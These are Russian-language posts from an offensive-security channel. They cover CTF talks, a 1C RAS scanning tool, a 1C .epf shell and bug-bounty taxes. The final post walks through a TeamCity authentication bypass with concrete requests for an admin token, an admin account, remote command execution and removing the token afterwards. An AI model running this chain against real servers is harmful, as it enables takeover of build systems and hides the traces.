А вот и записи и слайды докладов с VolgaCTF 2023 подъехали :)

https://www.youtube.com/playlist?list=PLn9UM_ZLJ6PBx5fsRS5AKZDjJZ7znC5yp

http://archive.volgactf.ru/#volgactf_2023/slides/

Победители KazHackStan 2023 рассказали о своей подготовке к кибербитве, векторе до SCADA системы в City и захвате дрона на полигоне CyberKumbez

https://habr.com/ru/articles/763774/

Пентестеры в СНГ часто сталкиваются с 1С-серверами внутри инфраструктур, один из векторов атак - Консоль Администрирования Кластеров 1С (RAS).
Чтобы попытаться подключиться к нему - подбирают версию клиента коноли аналогичную серверу, скачивают нужный серверный дистрибутив под винду и только тогда смогут зайти под имеющимися/пустыми кредами получая кучу полезной информации.

Я автоматизировал этот процесс благодаря консольной утилите rac от 1С для Linux. Более того, больше не нужно подбирать версию клиента и сервера - утилита rac работает с разными версиями серверов.

Этапы: Скан nmap с поиском открытых портов RAS, Сбор информации при успешном подключении к серверу, Выгрузка полученной информации в .csv под каждый сервер. Более подробно в README

https://github.com/sdnv0x4d/rasoff

Снова про #1С

Как пишут в документации: "Внешние обработки представляют собой обработки, которые не входят в состав прикладного решения и хранятся в отдельных файлах с расширением *. epf.".
Так же пишут: "В режиме 1С:Предприятие внешнюю обработку можно запустить на выполнение, открыв ее как любой другой файл, хранящийся на диске."

В правом верхнем углу нажимаем на "бутерброд" -> Файл -> Открыть.

Выбираем наш epf и жмём "ок".
Но только 1С может быть не только под Windows, но и под Linux. Поэтому в коллекцию еще один шелл, который универсальный и под любую операционную систему.

>

Товарищи багхантеры! Я к вам с хорошими новостями, которые помогут вам сэкономить больше денег с выплат.

Еще в 2020 году, Никита публиковал такую вот хорошие статью: https://habr.com/ru/articles/483082/

Но есть еще нюансы, которые кому-то могут помочь.

Для ИП на УСН для некоторых регионов есть льготы, а именно – это 1% на доход, шикарно же!

В список регионов с таким процентом входят:
- Республика Дагестан
- Мурманская область
- Ненецкая AO

И еще несколько регионов с процентом – 4. Подробная таблица здесь: https://e-kontur.ru/enquiry/276/check_usn

В итоге, если ваши выплаты переваливают за 1 млн рублей и у вас есть возможность оформить ИП в юрисдикции этих регионов, то вперед. Если меньше, то смысла нет, лучше не париться и сидеть на “самозанятом”.

К примеру, если вы получите выплат за 2023 год на 2 млн рублей:
- Самозанятый заплатит – 120к рублей
- ИП на УСН в льготном регионе – фиксированный страховой взнос – 45к, 1% на доход свыше 300к (но тут можно уменьшить это) - 17к и сам налог на доход – 20к = 77к. Чем больше выплат, тем больше экономия.

Token that gives me power

Наверно кто-то слышал про новую проблему в JetBrains TeamCity, связанная с RPC2

В целом стоит начать, что TeamCity используется для автоматизированной сборки и тестирования ПО. А он написан на Java

Ребята нашли интересный дифф в методе XmlRpcController.getPathSuffix. Точнее был прикол, связанный с wildcard path. Плюс TeamCity использует фреймворк Spring, а там существует интерцептор, который позволяет модифицировать входящие HTTP-запросы (thx to riven). По этим и другим причинам, любой входящий HTTP-запрос, имеющий путь /**/RPC2, не будет подвергаться проверке аутентификации. А значит мы можем использовать API-ручки для получения токенов почти любых пользователей и для дальнейшего создания собственного юзера.

/app/rest/users/<userLocator>/tokens/<tokenName>

Отсюда мы имеем следующий сценарий

Получаем токен администратора

POST /app/rest/users/id:1/tokens/RPC2

С его помощью, мы теперь можем создать пользователя с админскими правами

POST localhost:8111/app/rest/users -H "Content-Type: application/json" --data "{\"username\": \"monkey1\", \"password\": \"monkey\", \"email\": \"monkey\", \"roles\": {\"role\": [{\"roleId\": \"SYSTEM_ADMIN\", \"scope\": \"g\"}]}}" -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.eWaBWGhGSFBZVHB4WvAxNEptVmhQUkkxN0VF.MjhmYTY2MjUtNjZhNy00OTQ0LTk4LmItYzI1N2Q3MjIwMzE2"

Но, мы можем пойти дальше и докрутить до RCE. Первым делом включаем дебаг (токен здесь также потребуется)

POST /admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable=true

Не забываем все это применить к текущему конфигу

POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties

И теперь мы имеем возможность исполнять команды

POST /app/rest/debug/processes?exePath=id

Не забываем удалять токен

DELETE /app/rest/users/id:1/tokens/RPC2